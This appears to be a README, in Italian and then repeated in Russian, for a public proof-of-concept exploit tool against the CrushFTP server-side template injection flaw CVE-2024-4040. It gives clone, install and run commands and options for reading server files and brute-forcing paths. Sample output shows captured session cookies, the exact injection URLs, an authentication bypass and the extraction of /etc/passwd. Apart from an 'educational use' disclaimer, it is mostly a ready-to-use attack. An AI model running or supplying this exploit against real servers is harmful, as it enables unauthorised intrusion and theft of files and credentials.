
è un PoC per CVE-2024-4040, uno strumento per sfruttare la vulnerabilità SSTI in CrushFTP
GenCrushSSTIExploit è uno strumento di exploit PoC che mira alla vulnerabilità SSTI (Server-Side Template Injection) in CrushFTP CVE-2024-4040. Questo strumento dimostra come sfruttare questa vulnerabilità esclusivamente per scopi educativi e di hacking etico.
rich per un output console bello e stilizzato.⚠️ Usa questo strumento in modo responsabile! È destinato solo a scopi di ricerca ed educativi. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.
pip (installatore di pacchetti Python)git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit
pip install -r requirements.txt
python GenCrushSSTIExploit.py -t <TARGET_URL>
-t / --target: Specifica l'URL di destinazione del server CrushFTP vulnerabile.-l / --lfi: Local File Inclusion. Specifica il file da includere per l'estrazione.-w / --wordlist: Specifica una wordlist per forzare i percorsi dei file.python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------
[*] Подключение к ServerSessionAJAX...
[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987
[*] Попытка эксплуатации уязвимости SSTI...
[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a
[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com
[*] Попытка обхода аутентификации...
[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a
[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...
GenCrushSSTIExploit — это PoC инструмент эксплуатации уязвимости SSTI (Server-Side Template Injection) в CrushFTP CVE-2024-4040. Этот инструмент демонстрирует, как использовать данную уязвимость в образовательных и этических целях.
rich для красивого и стилизованного вывода на консоль.⚠️ Используйте этот инструмент ответственно! Он предназначен только для исследований и образовательных целей. Автор не несет ответственности за любое неправильное использование или ущерб, причиненный этим инструментом.
pip (менеджер пакетов Python)git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit
pip install -r requirements.txt
python GenCrushSSTIExploit.py -t <ЦЕЛЕВОЙ_URL>
-t / --target: Указывает целевой URL уязвимого сервера CrushFTP.-l / --lfi: Включение локального файла. Указывает файл для извлечения.-w / --wordlist: Указывает словарь для перебора путей к файлам.python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------
[*] Подключение к ServerSessionAJAX...
[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987
[*] Попытка эксплуатации уязвимости SSTI...
[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a
[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com
[*] Попытка обхода аутентификации...
[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a
[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...